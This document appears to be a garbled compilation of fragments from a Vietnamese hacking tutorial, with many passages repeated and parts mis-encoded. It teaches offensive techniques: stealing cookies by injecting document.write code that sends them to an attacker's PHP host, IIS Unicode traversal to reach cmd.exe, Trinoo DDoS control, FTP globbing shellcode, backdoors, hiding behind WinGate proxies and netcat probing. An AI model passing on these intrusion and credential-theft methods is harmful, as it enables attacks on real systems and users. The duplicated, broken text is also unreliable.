... VD sau : http://www.company.com/cgi-bin/login.cgi với công việc cụ thể : + Tạo chương trình đếm số người ghé thăm + Cho phép ngườI khách làm làm Website bạn + Quản lý user name passwd thành ... rồI tự động save thông tin thành file < ip nạn nhân > txt _ Còn cách để lấy cookie đựơc sử dụng forum bị lỗi chưa fix , post bạn chi cần thêm đoạn mã sau vào : CODE document.write(` `) với host_php ... htaccess Do thư mục chúng có tác động qua lại để bảo vệ lẫn nên không dại mà cố gắng đột nhập crack mớ mật ( chưa có đồ nghề crack mật tay Tôi nghiên cứu để xâm nhập trực tiếp , thành công...
... proxy _ Làm để tìm Wingate ? + Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) đến yahoo hay trang tìm kiếm cable modem Tìm kiếm cable modems nhiều người dùng cable modems có WinGate để họ chia ... đoán mạng Tiểu sử từ ``ping`` sau: Ping tiếng động vang tàu ngầm muốn biếtcóvật thể khác gần hay ko, cóvật thể gần tàu ngầm tiếng sóng âm va vào vật thể tiếng vang lại ``pong`` tàu ngầm biết ... ping lần, bạn gõ CODE ``ping ip.address -t`` Cách làm máy ping Để thay đổi kích thước ping làm sau: CODE ``ping -l (size) địa_chỉ_ip `` Cái ping làm gửi gói tin đến máy tính, sau xem xem gói tin...
... bạn quan tâm đến đoạn string đặcbiệt URL đặctrưng cho kiểu trang Web forum ( quan trọng , bạn tự tìm hiểu thêm ) VD tìm với lỗi Hosting Controller ta có đoạn đặctrưng sau ``/admin hay /advadmin ... thang đặc quyền ) Ví dụ trường hợp hacker xâm nhập đựợc vào mạng với tài khoản guest, họ tìm cách kiểm soát toàn hệ thống Hacker tìm cách crack password admin, sử dụng lỗ hổng để leo thang đặc ... hệ điều hành làm cho người quản lý không nhận hệ thống bị xâm nhập cóbiêt không tìm kẻ xâm nhập + Creating ``Back Doors`` : ( Tạo cửa sau chuẩn bị cho lần xâm nhập dễ dàng ) Hacker để lại ``Back...
... người đăng nhập hệ thống có tên convit có thư mục /home/convit ) _ /bin : Nơi xử lý lệnh Unix cần thiết ls chẳng hạn _ /usr/bin : Nơi xử lý lệnh dặcbiệt khác , lệnh dùng người sử dụng đặcbiệt ... + Phải gửi lệnh FTP đặcbiệt chứa đựng globbing mẫu đặcbiệt mà không bị server phát có lỗi + Hacker ghi đè lên Function, Code tới Shellcode, thực thi bới Server FTP _ Ta phân tích VD sau việc ... làm sai chỗ ) Vậy bạn làm post lên cho anh em biết Lỗi Linux ( đặcbiệt Redhat ), bạn chờ đợi có lỗi bên “LỗI bảo mật” cập nhật Khai thác chúng hỏi Mod quản lý bên , đặcbiệtbạn Leonhart , cậu...
... lẽ kiểu công lợi hại làm boot máy tính đối phương nhanh gọn Cách làm tương tự DDos thay công nhiều máy tính ngườI công cần dùng máy công thông qua server lớn giới Vẫn với phương pháp giả mạo ... thực kết nối Hacker Trinoo Master dẫn cho Master để phát động công DDoS đến hay nhiều mục tiêu Trinoo Master liên lạc với Deadmons đưa địa dẫn đến để công hay nhiều mục tiêu khoảng thời gian xác ... , passwd nhập sai tự động thoát passwd nhập tự động chạy hệ thống attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]` kwijibo Connection closed by...
... PATH=/sbin:/usr/sbin: : _ Bản Netcat cho Win không cần phải compile có sẵn file nhị phân nc.exe Chỉ giải nén chạy xong c ) Các tùy chọn Netcat : _ Netcat chạy chế độ dòng lệnh Bạn chạy nc -h đểbiết tham ... Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html Đểbiết thông tin chi tiết kết nối, bạn dùng –v ( -vv cho biết thông tin chi ... Thu, 03 Feb 2000 20:54:02 GMT ETag: ``0-cec-3899eaea`` Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, dùng...
... vào máy ngườI khác để ăn cắp nhũng tài liệu máy gửI cho chủ nhân , Cái mà ăn cắp mật , accourt , hay cookie ……… tuỳ theo ý muốn ngườI cài _ virus : Nói cho dễ hiểu chương trình vớI mã đặcbiệt ... địa IP mỗI người đạI diện cho ngườI đó, địa IP sử dụng máy tính khác để nhận biết máy tính kết nối chúng Đây lí bạn lại bị IRC cấm, cách người ta tìm IP bạn Địa IP dễ dàng phát ra, người ta lấy ... IRC, có IP bạn + ICQ, ngườibiết IP bạn, chí bạn chọn ``do not show ip`` người ta lấy + bạn kết nối với đó, họ gõ ``systat –n ``, biết kết nối đên họ + gửi cho bạn email với đoạn mã java tóm IP,...
... phép bạn chia kết nối Thí dụ: bạn chia sẻ modem với nhiều máy WinGate dùng với nhiều proxy khác che giấu bạn _ Làm để Wingate che dấu bạn ? Hãy làm theo : Bạn telnet cổng 23 máy chủ chạy WinGate ... proxy _ Làm để tìm Wingate ? + Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) đến yahoo hay trang tìm kiếm cable modem Tìm kiếm cable modems nhiều người dùng cable modems có WinGate để họ chia ... đoán mạng Tiểu sử từ ``ping`` sau: Ping tiếng động vang tàu ngầm muốn biếtcóvật thể khác gần hay ko, cóvật thể gần tàu ngầm tiếng sóng âm va vào vật thể tiếng vang lại ``pong`` tàu ngầm biết...
... bạn quan tâm đến đoạn string đặcbiệt URL đặctrưng cho kiểu trang Web forum ( quan trọng , bạn tự tìm hiểu thêm ) VD tìm với lỗi Hosting Controller ta có đoạn đặctrưng sau ``/admin hay /advadmin ... người đăng nhập hệ thống có tên convit có thư mục /home/convit ) _ /bin : Nơi xử lý lệnh Unix cần thiết ls chẳng hạn _ /usr/bin : Nơi xử lý lệnh dặcbiệt khác , lệnh dùng người sử dụng đặcbiệt ... vào máy ngườI khác để ăn cắp nhũng tài liệu máy gửI cho chủ nhân , Cái mà ăn cắp mật , accourt , hay cookie ……… tuỳ theo ý muốn ngườI cài _ virus : Nói cho dễ hiểu chương trình vớI mã đặc biệt...
... bạn quan tâm đến đoạn string đặcbiệt URL đặctrưng cho kiểu trang Web forum ( quan trọng , bạn tự tìm hiểu thêm ) VD tìm với lỗi Hosting Controller ta có đoạn đặctrưng sau ``/admin hay /advadmin ... người đăng nhập hệ thống có tên convit có thư mục /home/convit ) _ /bin : Nơi xử lý lệnh Unix cần thiết ls chẳng hạn _ /usr/bin : Nơi xử lý lệnh dặcbiệt khác , lệnh dùng người sử dụng đặcbiệt ... vào máy ngườI khác để ăn cắp nhũng tài liệu máy gửI cho chủ nhân , Cái mà ăn cắp mật , accourt , hay cookie ……… tuỳ theo ý muốn ngườI cài _ virus : Nói cho dễ hiểu chương trình vớI mã đặc biệt...
... vào máy ngườI khác để ăn cắp nhũng tài liệu máy gửI cho chủ nhân , Cái mà ăn cắp mật , accourt , hay cookie ……… tuỳ theo ý muốn ngườI cài _ virus : Nói cho dễ hiểu chương trình vớI mã đặcbiệt ... ngườibiết IP bạn, chí bạn chọn ``do not show ip`` người ta lấy + bạn kết nối với đó, họ gõ ``systat –n ``, biết kết nối đên họ + gửi cho bạn email với đoạn mã java tóm IP, họ tóm IP bạn ) Làm ... địa IP mỗI người đạI diện cho ngườI đó, địa IP sử dụng máy tính khác để nhận biết máy tính kết nối chúng Đây lí bạn lại bị IRC cấm, cách người ta tìm IP bạn Địa IP dễ dàng phát ra, người ta lấy...
... chứa tất file website, làm chúng có hiệu lực cho người dùng internet Nhưng tất phần mềm khác, (đặc biệt Microsoft) có lỗ hỏng bảo mật Unicode IIS Microsoft, "không may" người quản trị lại không ... mục, đỗ vỡ bạn nhận thông báo lỗi trình duyệt Tiếc quá! không hoạt động Nếu quen với FTP, bạnbiết lệnh DIRUP dùng để làm Lệnh để đến thư mục / / Nếu bạn thiết kế web hay mã html chắn bạn dùng ... host không? Khai thác đây, có vài lý không hoạt động Đầu tiên, bạn làm với server’s local c:\ Bạn cần vài thứ đểđóng thư mục Web server không làm cho bạn Vì cần mở cmd.exe (dấu nhắc DOS) server...
... Việt ( Thông thường có sử dụng dấu “ < == ” để giải thích phiá đuôi đoạn code Các bạnđể ý mà fix 47 ) Các công cụ cần thiết để hack Web : _ Đối với hacker chuyên nghiệp họ không cần sử dụng ... Nhân xin đính lại đoạn code mà phân tích post lên phần trước sơ ý không thêm ký hiệu “#” vào trước câu phân tích , dẫn đến việc số bạn thắc mắc đoạn code không hoạt động Tôi thành thật xin lỗi ... }; sub connecttoserver { print("Connect den host: $host\n"); $socket = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM ) || die "khong the connect...
... bạn quan tâm đến đoạn string đặcbiệt URL đặctrưng cho kiểu trang Web forum ( quan trọng , bạn tự tìm hiểu thêm ) VD tìm với lỗi Hosting Controller ta có đoạn đặctrưng sau "/admin hay /advadmin ... người đăng nhập hệ thống có tên convit có thư mục /home/convit ) _ /bin : Nơi xử lý lệnh Unix cần thiết ls chẳng hạn _ /usr/bin : Nơi xử lý lệnh dặcbiệt khác , lệnh dùng người sử dụng đặcbiệt ... VD sau : http://www.company.com/cgi-bin/login.cgi với công việc cụ thể : + Tạo chương trình đếm số người ghé thăm + Cho phép ngườI khách làm làm Website bạn + Quản lý user name passwd thành...
... vào máy ngườI khác để ăn cắp nhũng tài liệu máy gửI cho chủ nhân , Cái mà ăn cắp mật , accourt , hay cookie ……… tuỳ theo ý muốn ngườI cài _ virus : Nói cho dễ hiểu chương trình vớI mã đặcbiệt ... địa IP mỗI người đạI diện cho ngườI đó, địa IP sử dụng máy tính khác để nhận biết máy tính kết nối chúng Đây lí bạn lại bị IRC cấm, cách người ta tìm IP bạn Địa IP dễ dàng phát ra, người ta lấy ... phép bạn chia kết nối Thí dụ: bạn chia sẻ modem với nhiều máy WinGate dùng với nhiều proxy khác che giấu bạn _ Làm để Wingate che dấu bạn ? Hãy làm theo : Bạn telnet cổng 23 máy chủ chạy WinGate...
... lẽ kiểu công lợi hại làm boot máy tính đối phương nhanh gọn Cách làm tương tự DDos thay công nhiều máy tính ngườI công cần dùng máy công thông qua server lớn giới Vẫn với phương pháp giả mạo ... thực kết nối Hacker Trinoo Master dẫn cho Master để phát động công DDoS đến hay nhiều mục tiêu Trinoo Master liên lạc với Deadmons đưa địa dẫn đến để công hay nhiều mục tiêu khoảng thời gian xác ... , passwd nhập sai tự động thoát passwd nhập tự động chạy hệ thống attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]` kwijibo Connection closed by...
... Việt ( Thông thường có sử dụng dấu “ < == ” để giải thích phiá đuôi đoạn code Các bạnđể ý mà fix 47 ) Các công cụ cần thiết để hack Web : _ Đối với hacker chuyên nghiệp họ không cần sử dụng ... Nhân xin đính lại đoạn code mà phân tích post lên phần trước sơ ý không thêm ký hiệu “#” vào trước câu phân tích , dẫn đến việc số bạn thắc mắc đoạn code không hoạt động Tôi thành thật xin lỗi ... }; sub connecttoserver { print("Connect den host: $host\n"); $socket = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM ) || die "khong the connect...
... Lnh mkdir : to th mc Vớ d : $ mkdir /home/convit - > nú s to th mc convit /home _ Lnh rmdir : g b th mc Vớ d : $ rmdir /home/conga > nú s g b th mc conga /home _ Lnh ls: lit kờ ni dung th ... ang chy Windows9x Hacker s gi cỏc gúi tin vi d liu ``Out of Band`` n cng 139 ca mỏy tớnh ớch.( Cng 139 chớnh l cng NetBIOS, cng ny ch chp nhn cỏc gúi tin cú c Out of Band c bt ) Khi mỏy tớnh ... Netcat h tr phm vi cho s hiu cng Cỳ phỏp l cng1-cng2 Vớ d: 1-8080 ngha l 1,2,3, ,8080 d ) Tỡm hiu Netcat qua cỏc VD : _ Chp banner ca web server : Vớ d: nc n 172.16.84.2, cng 80 CODE C:\ > nc 172.16.84.2...